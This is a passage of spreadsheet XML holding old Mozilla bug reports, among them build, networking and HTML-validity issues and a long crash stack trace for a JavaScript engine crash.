&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
height='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/stgreen.gif' height=6
width=6 vspace=10 hspace=5 border=0 name=indbox&gt;
Japanese 119-2b
Economics 150b
Economics 161b
Molecular Cellular &amp; Dev Biol 110b
&lt;img src='https://classes.yale.edu/jsp/transpace.gif' height='3' width='100'
vspace='1' border='0' suppress='true'&gt;
Elementary  Japanese III
</t>
  </si>
  <si>
    <t>mattiasottervik</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-472424</t>
  </si>
  <si>
    <t>talos reboots.</t>
  </si>
  <si>
    <t>I'll probably end up filing a bug like this at least once a week as the catch all for falling over talos boxes - is there another way that we'd like to track it?  Or is a new bug post each colo-trip acceptable?
Anyway here's the list for now:
qm-mini-vista02
qm-pxp-trunk01
qm-pxp-fast01</t>
  </si>
  <si>
    <t>THUNDERBIRD-473493</t>
  </si>
  <si>
    <t>archive folder should sort towards the top of the folder pane</t>
  </si>
  <si>
    <t>Created attachment 356872
proposed fix
per Bryan the Archives folder should sort towards the top of the folder pane.  This makes it so. You may need to restart to see the archives folder sort towards the top but I believe that's a bug in the folder pane not the archives folder code.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-383907</t>
  </si>
  <si>
    <t>bl-bldlnx01 (Linux perf tinderbox)'s Tp numbers are broken</t>
  </si>
  <si>
    <t>The Tp value for that machine is displaying as nanms apparently since around 16:30 on Saturday.</t>
  </si>
  <si>
    <t>SEAMONKEY-233751</t>
  </si>
  <si>
    <t>build fails on case sensitive HFS+ file system due to case-sensitivity typos in #includes</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7a) Gecko/20040210
Some #include directives reference non-canonical casings of #include'd files. This works fine on case-
insensitive file systems such as HFS+ but breaks on case-sensisitve file systems such as Case 
Sensitive HFS+.
Reproducible: Always
Steps to Reproduce:
1. Put source tree on a Case Sensistive HFS+ volume.
2. Build.
Actual Results:  
build fails
Expected Results:  
build should succeed</t>
  </si>
  <si>
    <t>ch-moz2</t>
  </si>
  <si>
    <t>FIREFOX-424626</t>
  </si>
  <si>
    <t>Shell Integration</t>
  </si>
  <si>
    <t>(linux) Firefox is put into offline mode on startup when NetworkManager is running but not controlling the active network interface (e.g. when using PPP)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9b5pre) Gecko/2008032215 Minefield/3.0b5pre
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9b5pre) Gecko/2008032215 Minefield/3.0b5pre
On my Debian system I had the NetworkManager service running however my wired network interface was controlled manually (in my case the relevant entry in /etc/network/interfaces was iface eth1 inet static which prevents NetworkManager from managing that interface). Therefore when using the wired interface I had network access however NetworkManager reports no network devices present (the commandline program nm-tool yielded:
NetworkManager Tool
State: disconnected
print_devices(): didn't get a reply from NetworkManager.
There are no available network devices.
).
This caused Firefox 3 to startup in Offline mode which forced me to manually uncheck File-&gt;Work Offline at the beginning of each session.
As a workaround I now disable the NetworkManager service before starting Firefox (now nm-tool reports
NetworkManager Tool
get_nm_state(): didn't get a reply from NetworkManager.
NetworkManager appears not to be running (could not get its state).
).
If NetworkManager intends that it is accurately reporting the online status of the computer (does it? or does it intend to only report the state of the connections that it is managing?) then I suppose that NetworkManager has a bug.
However in any case Firefox should have a config option that the user can use to tell Firefox not to query NetworkManager upon startup. 
Reproducible: Always
Steps to Reproduce:
1. Install NetworkManager
2. Configure things so that NetworkManager does not control any of the active network interfaces (I believe you can do this by adding all of the active interfaces to /etc/network/interfaces providing each of them with at least one option other than auto or dhcp). nm-tool should report state disconnected as described above.
3. Start Firefox. Observe that File-&gt;Work Offline is checked.
Actual Results:  
File-&gt;Work Offline is checked
Expected Results:  
I would expect that if I start Firefox when I am online (able to access remote web pages) and File-&gt;Work Offline was not checked at the end of my previous session that File-&gt;Work Offline would not be checked upon startup
I have heard of other people having similar problems in slightly different circumstances (see https://bugs.launchpad.net/ubuntu/+source/firefox-3.0/+bug/191889).
Since NetworkManager cannot currently be relied upon to accurately give the online status of the system I am requesting an option that tells tell Firefox not to query NetworkManager upon startup. I could not find such an option at http://kb.mozillazine.org/Category:Preferences.</t>
  </si>
  <si>
    <t>bshanks2</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-391103</t>
  </si>
  <si>
    <t>Invalid HTML on Firefox page (due to eBay-edition block)</t>
  </si>
  <si>
    <t>http://www.mozilla.com/en-US/firefox/ is no longer XHTML vadid because the special edition box is not correct HTML (inline level element  including a block-level  element).
http://validator.w3.org/check?verbose=1&amp;uri=http%3A%2F%2Fwww.mozilla.com%2Fen-US%2Ffirefox%2F
I have corrected the HTML on mozilla-europe (http://www.mozilla-europe.org/en/products/firefox/) here is the valid version:
Special Editions
Mozilla Firefox - eBay EditionBe a better bidder. Download now.
one CSS change :
#specialeditions p { display: block margin: 0 }</t>
  </si>
  <si>
    <t>CORE-308577</t>
  </si>
  <si>
    <t>Crash [@ js_GetSlotThreadSafe] because nsXBLPrototypeHandler::ExecuteHandler did not root handler</t>
  </si>
  <si>
    <t>00 0x100
01 js3250!js_GetSlotThreadSafe(struct JSContext * cx = 0x0c611ff0 struct 
JSObject * obj = 0x0d4561d0 unsigned long slot = 3)+0x34 (FPO: [Non-Fpo]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jslock.c @ 554]
02 js3250!JS_GetPrivate(struct JSContext * cx = 0x00e5435f struct JSObject * 
obj = 0x13224448)+0x69 (FPO: [200]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\js\src\jsapi.c @ 2160]
03 js3250!js_CloneFunctionObject(struct JSContext * cx = 0x00e5435f struct 
JSObject * funobj = 0x13224448 struct JSObject * parent = 0x00000000)+0x2c 
(FPO: [300]) (CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jsfun.c @ 2000]
04 js3250!JS_CloneFunctionObject(struct JSContext * cx = 0x00e5435f struct 
JSObject * funobj = 0x13224448 struct JSObject * parent = 0x00000000)+0x57 
(FPO: [300]) (CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jsapi.c @ 3254]
05 gklayout!nsJSContext::BindCompiledEventHandler(void * aTarget = 0x13224448 
class nsIAtom * aName = 0x00000000 void * aHandler = 0x0d4561d0)+0x87 (FPO: 
[Non-Fpo]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\dom\src\base\nsjsenvironment.cpp @ 1476]
06 gklayout!nsXBLPrototypeHandler::ExecuteHandler(class nsIDOMEventReceiver * 
aReceiver = 0x1497b390 class nsIDOMEvent * aEvent = 0x07466500)+0x787 (FPO: 
[Uses EBP] [22400]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\content\xbl\src\nsxblprototypehandler.cpp @ 495]
07 gklayout!nsXBLKeyEventHandler::HandleEvent(class nsIDOMEvent * aEvent = 
0x1497b390)+0xd2 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\content\xbl\src\nsxbleventhandler.cpp @ 151]
08 gklayout!nsEventListenerManager::HandleEventSubType(struct nsListenerStruct 
* aListenerStruct = 0x13809cf8 class nsIDOMEvent * aDOMEvent = 0x07466500 
class nsIDOMEventTarget * aCurrentTarget = 0x1497b390 unsigned int aSubType = 
0x7466508 unsigned int aPhaseFlags = 7)+0x14e (FPO: [Uses EBP] [5540]) 
(CONV: thiscall) [c:\build\chs3
\build\mozilla\content\events\src\nseventlistenermanager.cpp @ 1685]
09 gklayout!nsEventListenerManager::HandleEvent(class nsPresContext * 
aPresContext = 0x00000000 class nsEvent * aEvent = 0x0012cba8 class 
nsIDOMEvent ** aDOMEvent = 0x0012c964 class nsIDOMEventTarget * aCurrentTarget 
= 0x1497b390 unsigned int aFlags = 7 nsEventStatus * aEventStatus = 
0x0012caf8)+0x241 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\content\events\src\nseventlistenermanager.cpp @ 1786]
0a gklayout!nsXULElement::HandleDOMEvent(class nsPresContext * aPresContext = 
0x0c5ba7a0 class nsEvent * aEvent = 0x00000000 class nsIDOMEvent ** aDOMEvent 
= 0x0012c964 unsigned int aFlags = 7 nsEventStatus * aEventStatus = 
0x0012caf8)+0x5b2 (FPO: [Uses EBP] [51270]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\content\xul\content\src\nsxulelement.cpp @ 2201]
0b gklayout!PresShell::HandleEventInternal(class nsEvent * aEvent = 0x00000000 
class nsIView * aView = 0x0b929510 unsigned int aFlags = 1 nsEventStatus * 
aStatus = 0x0012caf8)+0x1dc (FPO: [Non-Fpo]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\layout\base\nspresshell.cpp @ 6379]
0c gklayout!PresShell::HandleEvent(class nsIView * aView = 0x0b929510 class 
nsGUIEvent * aEvent = 0x0012cba8 nsEventStatus * aEventStatus = 0x0012caf8 
int aForceHandle = 1 int * aHandled = 0x0012caf4)+0x210 (FPO: [Non-Fpo]) 
(CONV: stdcall) [c:\build\chs3\build\mozilla\layout\base\nspresshell.cpp @ 6215]
0d gklayout!nsViewManager::HandleEvent(class nsView * aView = 0x00000001 class 
nsGUIEvent * aEvent = 0x00000000 int aCaptured = 0)+0x2bc (FPO: [Non-Fpo]) 
(CONV: thiscall) [c:\build\chs3\build\mozilla\view\src\nsviewmanager.cpp @ 2514]
0e gklayout!nsViewManager::DispatchEvent(class nsGUIEvent * aEvent = 
0x3d888889 nsEventStatus * aStatus = 0x0012cb6c)+0x63a (FPO: [Non-Fpo]) (CONV: 
stdcall) [c:\build\chs3\build\mozilla\view\src\nsviewmanager.cpp @ 2246]
0f gklayout!HandleEvent(class nsGUIEvent * aEvent = 0x0012cba8)+0x27 (FPO: [Non-
Fpo]) (CONV: cdecl) [c:\build\chs3\build\mozilla\view\src\nsview.cpp @ 174]
10 gkwidget!nsWindow::DispatchEvent(class nsGUIEvent * event = 0x00000000 
nsEventStatus * aStatus = 0x07d8e910)+0x35 (FPO: [300]) (CONV: stdcall) 
[c:\build\chs3\build\mozilla\widget\src\windows\nswindow.cpp @ 1253]
11 gkwidget!nsWindow::DispatchWindowEvent(class nsGUIEvent * event = 0x00000000)
+0x16 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\widget\src\windows\nswindow.cpp @ 1274]
12 gkwidget!nsWindow::DispatchKeyEvent(unsigned int aEventType = 0x83 unsigned 
short aCharCode = 0 unsigned int aVirtualCharCode = 0x26 long aKeyData = 
0x1480001 unsigned int aFlags = 0)+0xa4 (FPO: [Non-Fpo]) (CONV: thiscall) 
[c:\build\chs3\build\mozilla\widget\src\windows\nswindow.cpp @ 3449]
13 gkwidget!nsWindow::OnKeyDown(unsigned int aVirtualKeyCode = 0x26 unsigned 
int aScanCode = 0x148 long aKeyData = 0x1480001)+0x30e (FPO: [Non-Fpo]) (CONV: 
thiscall) [c:\build\chs3\build\mozilla\widget\src\windows\nswindow.cpp @ 3587]
14 gkwidget!nsWindow::ProcessMessage(unsigned int msg = 0x100 unsigned int 
wParam = 0x26 long lParam = 0x1480001 long * aRetValue = 0x0012cf30)+0xa5b 
(FPO: [Non-Fpo]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\widget\src\windows\nswindow.cpp @ 4490]
15 gkwidget!nsWindow::WindowProc(struct HWND__ * hWnd = 0x001012a0 unsigned 
int msg = 0x100 unsigned int wParam = 0x26 long lParam = 0x7d8e914)+0x9c 
(FPO: [Non-Fpo]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\widget\src\windows\nswindow.cpp @ 1435]
16 USER32!InternalCallWinProc+0x28
17 USER32!UserCallWinProcCheckWow+0x150 (FPO: [Non-Fpo])
18 USER32!DispatchMessageWorker+0x306 (FPO: [Non-Fpo])
19 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
1a gkwidget!nsAppShell::DispatchNativeEvent(int aRealEvent = 1 void * aEvent = 
0x00000000)+0xa (FPO: [300]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\widget\src\windows\nsappshell.cpp @ 221]
1b jsd3250!jsdService::EnterNestedEventLoop(class jsdINestCallback * callback = 
0x00000000 unsigned int * _rval = 0x0012d0ec)+0x127 (FPO: [Non-Fpo]) (CONV: 
stdcall) [c:\build\chs3\build\mozilla\js\jsd\jsd_xpc.cpp @ 2966]
1c xpcom_core!XPTC_InvokeByIndex(class nsISupports * that = 0x01b815e0 
unsigned int methodIndex = 0x31 unsigned int paramCount = 2 struct 
nsXPTCVariant * params = 0x0012d0dc)+0x27 (CONV: cdecl) [c:\build\chs3
\build\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcinvoke.cpp @ 102]
1d xpc3250!XPCWrappedNative::CallMethod(class XPCCallContext * ccx = 
0x0012d280 XPCWrappedNative::CallMode mode = CALL_METHOD (0))+0x6c4 (FPO: [Non-
Fpo]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappednative.cpp @ 2139]
1e xpc3250!XPC_WN_CallMethod(struct JSContext * cx = 0x01cf31e8 struct 
JSObject * obj = 0x0cd3a040 unsigned int argc = 1 long * argv = 0x0b4ae10c 
long * vp = 0x0012d340)+0x8e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappednativejsops.cpp @ 1402]
1f js3250!js_Invoke(struct JSContext * cx = 0x00000001 unsigned int argc = 1 
unsigned int flags = 0)+0x539 (FPO: [Uses EBP] [3350]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 1163]
20 js3250!js_Interpret(struct JSContext * cx = 0x01cf31e8 unsigned char * pc = 
0x0c71f78f : long * result = 0x0012d5c0)+0x4ff7 (FPO: [Uses EBP] [3830]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 3460]
21 js3250!js_Invoke(struct JSContext * cx = 0x00000001 unsigned int argc = 3 
unsigned int flags = 2)+0x57a (FPO: [Uses EBP] [3350]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 1183]
22 xpc3250!nsXPCWrappedJSClass::CallMethod(class nsXPCWrappedJS * wrapper = 
0x03d42008 unsigned short methodIndex = 3 class nsXPTMethodInfo * info = 
0x01abcff0 struct nsXPTCMiniVariant * nativeParams = 0x0012d768)+0x6b1 (FPO: 
[Uses EBP] [5820]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappedjsclass.cpp @ 1340]
23 xpc3250!nsXPCWrappedJS::CallMethod(unsigned short methodIndex = 0x2008 
class nsXPTMethodInfo * info = 0x00000003 struct nsXPTCMiniVariant * params = 
0x0012d824)+0x27 (FPO: [400]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappedjs.cpp @ 515]
24 xpcom_core!PrepareAndDispatch(class nsXPTCStubBase * self = 0x0cd42008 
unsigned int methodIndex = 3 unsigned int * args = 0x0012d824 unsigned int * 
stackBytesToPop = 0x0012d814)+0xee (FPO: [Non-Fpo]) (CONV: stdcall) 
[c:\build\chs3\build\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcstubs.cpp @ 
117]
25 xpcom_core!SharedStub(void)+0x16 (CONV: cdecl) [c:\build\chs3
\build\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcstubs.cpp @ 147]
26 jsd3250!jsds_ExecutionHookProc(struct JSDContext * jsdc = 0x01ba9e48 struct 
JSDThreadState * jsdthreadstate = 0x14154fd0 unsigned int type = 1 void * 
callerdata = 0x00000001 long * rval = 0x0012da40)+0x182 (FPO: [Non-Fpo]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\js\jsd\jsd_xpc.cpp @ 682]
27 jsd3250!jsd_CallExecutionHook(struct JSDContext * jsdc = 0x01ba9e48 struct 
JSContext * cx = 0x01cf31e8 unsigned int type = 1  * hook = 
0x010b7eb1 void * hookData = 0x00000001 long * rval = 0x0012da40)+0x56 (FPO: 
[Non-Fpo]) (CONV: cdecl) [c:\build\chs3\build\mozilla\js\jsd\jsd_hook.c @ 178]
28 jsd3250!jsd_TrapHandler(struct JSContext * cx = 0x01cf31e8 struct JSScript 
* script = 0x0caa9f38 unsigned char * pc = 0x0caa9f69 S long * rval = 
0x0012da40 void * closure = 0x13fa4b41)+0x6c (FPO: [Non-Fpo]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\jsd\jsd_scpt.c @ 735]
29 js3250!JS_HandleTrap(struct JSContext * cx = 0x01cf31e8 struct JSScript * 
script = 0x0caa9f38 unsigned char * pc = 0x0caa9f69 S long * rval = 
0x0012da40)+0x31 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\js\src\jsdbgapi.c @ 212]
2a js3250!js_Interpret(struct JSContext * cx = 0x01cf31e8 unsigned char * pc = 
0x0caa9f69 S long * result = 0x0012daec)+0x1e6 (FPO: [Uses EBP] [3830]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 4051]
2b js3250!js_Invoke(struct JSContext * cx = 0x00000001 unsigned int argc = 1 
unsigned int flags = 0)+0x57a (FPO: [Uses EBP] [3350]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 1183]
2c js3250!js_Interpret(struct JSContext * cx = 0x01cf31e8 unsigned char * pc = 
0x1404fd44 : long * result = 0x0012dd04)+0x4ff7 (FPO: [Uses EBP] [3830]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 3460]
2d js3250!js_Invoke(struct JSContext * cx = 0x00000001 unsigned int argc = 2 
unsigned int flags = 0)+0x57a (FPO: [Uses EBP] [3350]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 1183]
2e js3250!js_Interpret(struct JSContext * cx = 0x01cf31e8 unsigned char * pc = 
0x029f24c6 : long * result = 0x0012df1c)+0x4ff7 (FPO: [Uses EBP] [3830]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 3460]
2f js3250!js_Invoke(struct JSContext * cx = 0x00000001 unsigned int argc = 2 
unsigned int flags = 0)+0x57a (FPO: [Uses EBP] [3350]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 1183]
30 js3250!js_Interpret(struct JSContext * cx = 0x01cf31e8 unsigned char * pc = 
0x01b245dd : long * result = 0x0012e134)+0x4ff7 (FPO: [Uses EBP] [3830]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 3460]
31 js3250!js_Invoke(struct JSContext * cx = 0x00000001 unsigned int argc = 3 
unsigned int flags = 2)+0x57a (FPO: [Uses EBP] [3350]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 1183]
32 xpc3250!nsXPCWrappedJSClass::CallMethod(class nsXPCWrappedJS * wrapper = 
0x03592fa8 unsigned short methodIndex = 3 class nsXPTMethodInfo * info = 
0x019c7150 struct nsXPTCMiniVariant * nativeParams = 0x0012e2dc)+0x6b1 (FPO: 
[Uses EBP] [5820]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappedjsclass.cpp @ 1340]
33 xpc3250!nsXPCWrappedJS::CallMethod(unsigned short methodIndex = 0x2fa8 
class nsXPTMethodInfo * info = 0x00000003 struct nsXPTCMiniVariant * params = 
0x0012e398)+0x27 (FPO: [400]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappedjs.cpp @ 515]
34 xpcom_core!PrepareAndDispatch(class nsXPTCStubBase * self = 0x0c592fa8 
unsigned int methodIndex = 3 unsigned int * args = 0x0012e398 unsigned int * 
stackBytesToPop = 0x0012e388)+0xee (FPO: [Non-Fpo]) (CONV: stdcall) 
[c:\build\chs3\build\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcstubs.cpp @ 
117]
35 xpcom_core!SharedStub(void)+0x16 (CONV: cdecl) [c:\build\chs3
\build\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcstubs.cpp @ 147]
36 xpcom_core!XPTC_InvokeByIndex(class nsISupports * that = 0x0c592fa8 
unsigned int methodIndex = 3 unsigned int paramCount = 3 struct nsXPTCVariant 
* params = 0x0012e3d4)+0x27 (CONV: cdecl) [c:\build\chs3
\build\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcinvoke.cpp @ 102]
37 xpc3250!XPCWrappedNative::CallMethod(class XPCCallContext * ccx = 
0x0012e578 XPCWrappedNative::CallMode mode = CALL_METHOD (0))+0x6c4 (FPO: [Non-
Fpo]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappednative.cpp @ 2139]
38 xpc3250!XPC_WN_CallMethod(struct JSContext * cx = 0x01cf31e8 struct 
JSObject * obj = 0x028a90f0 unsigned int argc = 3 long * argv = 0x02853a28 
long * vp = 0x0012e638)+0x8e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappednativejsops.cpp @ 1402]
39 js3250!js_Invoke(struct JSContext * cx = 0x00000001 unsigned int argc = 3 
unsigned int flags = 0)+0x539 (FPO: [Uses EBP] [3350]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 1163]
3a js3250!js_Interpret(struct JSContext * cx = 0x01cf31e8 unsigned char * pc = 
0x00a2ddb2 : long * result = 0x0012e8b8)+0x4ff7 (FPO: [Uses EBP] [3830]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 3460]
3b js3250!js_Invoke(struct JSContext * cx = 0x00000001 unsigned int argc = 1 
unsigned int flags = 2)+0x57a (FPO: [Uses EBP] [3350]) (CONV: cdecl) 
[c:\build\chs3\build\mozilla\js\src\jsinterp.c @ 1183]
3c xpc3250!nsXPCWrappedJSClass::CallMethod(class nsXPCWrappedJS * wrapper = 
0x0107c918 unsigned short methodIndex = 3 class nsXPTMethodInfo * info = 
0x01bff3a0 struct nsXPTCMiniVariant * nativeParams = 0x0012ea60)+0x6b1 (FPO: 
[Uses EBP] [5820]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappedjsclass.cpp @ 1340]
3d xpc3250!nsXPCWrappedJS::CallMethod(unsigned short methodIndex = 0xc918 
class nsXPTMethodInfo * info = 0x00000003 struct nsXPTCMiniVariant * params = 
0x0012eb1c)+0x27 (FPO: [400]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\js\src\xpconnect\src\xpcwrappedjs.cpp @ 515]
3e xpcom_core!PrepareAndDispatch(class nsXPTCStubBase * self = 0x0707c918 
unsigned int methodIndex = 3 unsigned int * args = 0x0012eb1c unsigned int * 
stackBytesToPop = 0x0012eb0c)+0xee (FPO: [Non-Fpo]) (CONV: stdcall) 
[c:\build\chs3\build\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcstubs.cpp @ 
117]
3f xpcom_core!SharedStub(void)+0x16 (CONV: cdecl) [c:\build\chs3
\build\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcstubs.cpp @ 147]
40 gklayout!nsEventListenerManager::HandleEventSubType(struct nsListenerStruct 
* aListenerStruct = 0x06e95538 class nsIDOMEvent * aDOMEvent = 0x0c504628 
class nsIDOMEventTarget * aCurrentTarget = 0x01cf2fcc unsigned int aSubType = 
0xc504630 unsigned int aPhaseFlags = 4)+0x14e (FPO: [Uses EBP] [5540]) 
(CONV: thiscall) [c:\build\chs3
\build\mozilla\content\events\src\nseventlistenermanager.cpp @ 1685]
41 gklayout!nsEventListenerManager::HandleEvent(class nsPresContext * 
aPresContext = 0x00000000 class nsEvent * aEvent = 0x0012f87c class 
nsIDOMEvent ** aDOMEvent = 0x0012f83c class nsIDOMEventTarget * aCurrentTarget 
= 0x01cf2fcc unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x241 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\content\events\src\nseventlistenermanager.cpp @ 1786]
42 gklayout!nsGlobalWindow::HandleDOMEvent(class nsPresContext * aPresContext = 
0x13536228 class nsEvent * aEvent = 0x0012f87c class nsIDOMEvent ** aDOMEvent 
= 0x0012f83c unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x24d (FPO: [Non-Fpo]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\dom\src\base\nsglobalwindow.cpp @ 1525]
43 gklayout!nsXULDocument::HandleDOMEvent(class nsPresContext * aPresContext = 
0x13536228 class nsEvent * aEvent = 0x00000000 class nsIDOMEvent ** aDOMEvent 
= 0x0012f83c unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x6f (FPO: [Non-Fpo]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\content\xul\document\src\nsxuldocument.cpp @ 1238]
44 gklayout!nsXULElement::HandleDOMEvent(class nsPresContext * aPresContext = 
0x13536228 class nsEvent * aEvent = 0x00000000 class nsIDOMEvent ** aDOMEvent 
= 0x0012f83c unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x54a (FPO: [Uses EBP] [51270]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\content\xul\content\src\nsxulelement.cpp @ 2183]
45 gklayout!nsXULElement::HandleDOMEvent(class nsPresContext * aPresContext = 
0x13536228 class nsEvent * aEvent = 0x00000000 class nsIDOMEvent ** aDOMEvent 
= 0x0012f83c unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x523 (FPO: [Uses EBP] [51270]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\content\xul\content\src\nsxulelement.cpp @ 2180]
46 gklayout!nsXULElement::HandleDOMEvent(class nsPresContext * aPresContext = 
0x13536228 class nsEvent * aEvent = 0x00000000 class nsIDOMEvent ** aDOMEvent 
= 0x0012f83c unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x523 (FPO: [Uses EBP] [51270]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\content\xul\content\src\nsxulelement.cpp @ 2180]
47 gklayout!nsXULElement::HandleDOMEvent(class nsPresContext * aPresContext = 
0x13536228 class nsEvent * aEvent = 0x00000000 class nsIDOMEvent ** aDOMEvent 
= 0x0012f83c unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x523 (FPO: [Uses EBP] [51270]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\content\xul\content\src\nsxulelement.cpp @ 2180]
48 gklayout!nsXULElement::HandleDOMEvent(class nsPresContext * aPresContext = 
0x13536228 class nsEvent * aEvent = 0x00000000 class nsIDOMEvent ** aDOMEvent 
= 0x0012f83c unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x523 (FPO: [Uses EBP] [51270]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\content\xul\content\src\nsxulelement.cpp @ 2180]
49 gklayout!nsXULElement::HandleChromeEvent(class nsPresContext * aPresContext 
= 0x13536228 class nsEvent * aEvent = 0x0012f87c class nsIDOMEvent ** 
aDOMEvent = 0x0012f83c unsigned int aFlags = 4 nsEventStatus * aEventStatus = 
0x0012f910)+0x30 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\content\xul\content\src\nsxulelement.cpp @ 2881]
4a gklayout!nsGlobalWindow::HandleDOMEvent(class nsPresContext * aPresContext = 
0x13536228 class nsEvent * aEvent = 0x0012f87c class nsIDOMEvent ** aDOMEvent 
= 0x0012f83c unsigned int aFlags = 7 nsEventStatus * aEventStatus = 
0x0012f910)+0x1e2 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\dom\src\base\nsglobalwindow.cpp @ 1512]
4b gklayout!DocumentViewerImpl::LoadComplete(unsigned int aStatus = 0)+0xa8 
(FPO: [Non-Fpo]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\layout\base\nsdocumentviewer.cpp @ 1012]
4c docshell!nsDocShell::EndPageLoad(class nsIWebProgress * aProgress = 
0x05e70224 class nsIChannel * aChannel = 0x07c7be6c unsigned int aStatus = 0)
+0x47 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\docshell\base\nsdocshell.cpp @ 4661]
4d docshell!nsWebShell::EndPageLoad(class nsIWebProgress * aProgress = 
0x05e70224 class nsIChannel * channel = 0x07c7be6c unsigned int aStatus = 0)
+0x8d (FPO: [Uses EBP] [31490]) (CONV: thiscall) [c:\build\chs3
\build\mozilla\docshell\base\nswebshell.cpp @ 667]
4e docshell!nsDocShell::OnStateChange(class nsIWebProgress * aProgress = 
0x05e70224 class nsIRequest * aRequest = 0x07c7be6c unsigned int aStateFlags 
= 0x5e70224 unsigned int aStatus = 0)+0x1df (FPO: [Non-Fpo]) (CONV: stdcall) 
[c:\build\chs3\build\mozilla\docshell\base\nsdocshell.cpp @ 4580]
4f docshell!nsDocLoader::FireOnStateChange(class nsIWebProgress * aProgress = 
0x05e70224 class nsIRequest * aRequest = 0x07c7be6c int aStateFlags = 
0x20010 unsigned int aStatus = 0)+0xf5 (FPO: [Non-Fpo]) (CONV: thiscall) 
[c:\build\chs3\build\mozilla\uriloader\base\nsdocloader.cpp @ 1220]
50 docshell!nsDocLoader::doStopDocumentLoad(class nsIRequest * request = 
0x00c3463f unsigned int aStatus = 0)+0x22 (FPO: [200]) (CONV: thiscall) 
